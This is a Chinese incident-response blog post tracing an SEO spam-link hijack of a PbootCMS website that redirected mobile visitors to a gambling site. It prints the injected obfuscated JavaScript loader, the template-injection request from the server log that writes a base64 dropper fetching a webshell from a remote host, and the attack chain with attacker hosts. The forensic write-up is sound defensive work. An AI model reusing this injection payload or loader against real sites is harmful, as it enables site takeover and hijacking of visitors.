应急响应|SEO暗链排查和溯源

admin 2024年3月14日18:06:27评论27 views字数 3400阅读11分20秒阅读模式

朋友的网站本来想看看seo做的怎么样,结果发现被劫持了。

应急响应|SEO暗链排查和溯源

应急响应|SEO暗链排查和溯源

pc端是正常访问的,手机端则跳转到bc站。

应急响应|SEO暗链排查和溯源

应急响应|SEO暗链排查和溯源

先看看前端里面被劫持的内容

<title>&#107;&#121;&#20307;&#32946;&#40;&#107;&#121;&#41;&#40;&#20013;&#22269;&#41;&#23448;&#26041;&#32593;&#31449;&#73;&#79;&#83;&#47;&#23433;&#21331;&#36890;&#29992;&#29256;&#47;&#25163;&#26426;&#65;&#80;&#80;</title><meta name="description" content="&#31532;&#19968;&#27493;&#58;&#35775;&#38382;&#107;&#121;&#20307;&#32946;&#39318;&#20808;&#44;&#25171;&#24320;&#24744;&#30340;&#97;&#112;&#112;&#27983;&#35272;&#22120;&#44;&#36755;&#20837;&#107;&#121;&#20307;&#32946;&#30340;&#23448;&#26041;&#32593;&#22336;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#104;&#116;&#104;&#57;&#57;&#54;&#54;&#46;&#118;&#105;&#112;&#46;&#46;&#46;&#46;&#10;&#31532;&#20108;&#27493;&#58;&#28857;&#20987;&#27880;&#20876;&#25353;&#38062;&#19968;&#26086;&#36827;&#20837;&#107;&#121;&#20307;&#32946;&#23448;&#32593;&#44;&#24744;&#20250;&#22312;&#39029;&#38754;&#19978;&#25214;&#21040;&#19968;&#20010;&#37266;&#30446;&#30340;&#27880;&#20876;&#25353;&#38062;&#12290;&#28857;&#20987;&#35813;&#25353;&#38062;&#44;&#46;&#46;&#46;&#10;&#31532;&#19977;&#27493;&#58;&#22635;&#20889;&#27880;&#20876;&#20449;&#24687;&#22312;&#27880;&#20876;&#39029;&#38754;&#19978;&#44;&#24744;&#38656;&#35201;&#22635;&#20889;&#19968;&#20123;&#24517;&#35201;&#30340;&#20010;&#20154;&#20449;&#24687;&#26469;&#21019;&#107;&#121;&#20307;&#32946;&#65039;" /><meta name="keywords" content="&#107;&#121;&#20307;&#32946;&#40;&#107;&#121;&#41;&#40;&#20013;&#22269;&#41;&#23448;&#26041;&#32593;&#31449;&#73;&#79;&#83;&#47;&#23433;&#21331;&#36890;&#29992;&#29256;&#47;&#25163;&#26426;&#65;&#80;&#80;" /><script type="text/javascript"> var bt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,32,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,47,97,104,117,105,46,106,105,115,50,51,50,46,99,99,47,97,104,117,105,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(bt); </script>

HTML解码一下

应急响应|SEO暗链排查和溯源

应急响应|SEO暗链排查和溯源

<script type="text/javascript"> var bt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,32,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,47,97,104,117,105,46,106,105,115,50,51,50,46,99,99,47,97,104,117,105,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(bt); </script>

这段js代码直接让ai帮我们分析就好

应急响应|SEO暗链排查和溯源

应急响应|SEO暗链排查和溯源

开始溯源,首先登录网站后台看看日志,日志中显示没有登录成功,那么很明显不是弱口令导致的(因为网站密码是比较强一点的弱口令)。

应急响应|SEO暗链排查和溯源

很明显这修改日期不对劲,因为最近没有操作文件,那很可能就是黑客弄得,那么我们开始还原攻击链

应急响应|SEO暗链排查和溯源

首先从这几个文件日期离我们当前日期最远的wolf.php开始

应急响应|SEO暗链排查和溯源

远程下载大马,命名为King.php,跟服务器的对上了

应急响应|SEO暗链排查和溯源

应急响应|SEO暗链排查和溯源

再看db.php很明显也是个马子,应该是为了防止木马被删故意伪装成db.php

应急响应|SEO暗链排查和溯源

进入服务器开始还原攻击,下载/www/wwwlogs/xx.xx.xxx.xx.log日志文件,搜索wolf.php

应急响应|SEO暗链排查和溯源

/{pboot:if((x22file_put_cox22.x22ntentsx22)(x22wolf.phpx22,(x22base6x22.x224_decodex22)(x22R2lmODlhPD9waHAKJGE9ImNvcHkiOwokYSgiaHR0cDovLzYxLjE0Ny45My4xMjE6OTk4OC9haC50eHQiLCJLaW5nLnBocCIpOwo/Pg==x22)))}{/pboot:if}/../../?p=1

把x22去掉

/{pboot:if((file_put_contents)(wolf.php,(base6.4_decode)(R2lmODlhPD9waHAKJGE9ImNvcHkiOwokYSgiaHR0cDovLzYxLjE0Ny45My4xMjE6OTk4OC9haC50eHQiLCJLaW5nLnBocCIpOwo/Pg==)))}{/pboot:if}/../../?p=1

很明显是PbootCMS模板注入,并且用x22进行绕过了

查看他攻击ip:103.123.4.235,四川的ip估计也是跳板机

应急响应|SEO暗链排查和溯源

应急响应|SEO暗链排查和溯源

大马样本链接https://s.threatbook.com/report/file/c2334df08eb35adf683a0bc0c1f35707a2750fa2b8707ee12a5c83a99783641f?sign=history&env=ubuntu_1704_x64

应急响应|SEO暗链排查和溯源

攻击链:

PbootCMS模板注入getshell>>远程http://61.147.93.121:9988/ah.txt下载大马>>修改template/中的index.html文件>>修改标题和关键字>>调用js文件https://ahui.jis232.cc/ahui.js>>重定向到xxx.vip

漏洞分析文章下次!

原文始发于微信公众号(星云安全):应急响应|SEO暗链排查和溯源

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月14日18:06:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   应急响应|SEO暗链排查和溯源https://cn-sec.com/archives/2574018.html

发表评论

匿名网友 填写信息